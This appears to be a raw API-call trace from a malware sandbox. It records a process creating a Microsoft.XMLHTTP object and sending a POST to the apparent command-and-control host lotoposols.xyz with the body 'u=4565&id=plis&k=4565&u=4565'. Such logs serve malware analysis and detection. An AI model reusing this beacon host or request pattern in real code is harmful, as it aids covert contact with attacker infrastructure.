	[0088.853] GetTickCount () returned 0x114d7f8
	[0088.853] longjmp () 
	[0088.853] longjmp () 
	[0088.853] longjmp () 
	[0088.853] longjmp () 
	[0088.854] longjmp () 
	[0088.854] longjmp () 
	[0088.854] longjmp () 
	[0088.854] longjmp () 
	[0088.854] longjmp () 
	[0088.854] longjmp () 
	[0088.855] longjmp () 
	[0088.855] longjmp () 
	[0088.855] longjmp () 
	[0088.855] longjmp () 
	[0088.855] longjmp () 
	[0088.855] longjmp () 
	[0088.857] longjmp () 
	[0088.857] longjmp () 
	[0088.857] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0088.857] SysStringLen (param_1=0x0) returned 0x0
	[0088.857] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0088.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0088.858] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0088.858] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0088.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5bc8) returned 0x0
	[0088.858] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0088.858] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5bc8, pUnkSite=0x3cacc0) returned 0x0
	[0088.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0088.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0088.858] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0088.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0088.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0088.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0088.859] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0088.859] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0088.859] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.860] XMLHTTPRequest:IUnknown:Release (This=0x47a5bc8) returned 0x0
	[0088.860] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0088.860] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0088.860] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0088.860] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0088.860] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0088.860] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0088.860] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0088.863] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0088.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0088.863] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0088.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0088.864] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0088.865] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0088.865] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0088.865] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0088.865] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.865] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0088.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0088.865] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0088.865] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0088.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0088.865] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0088.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
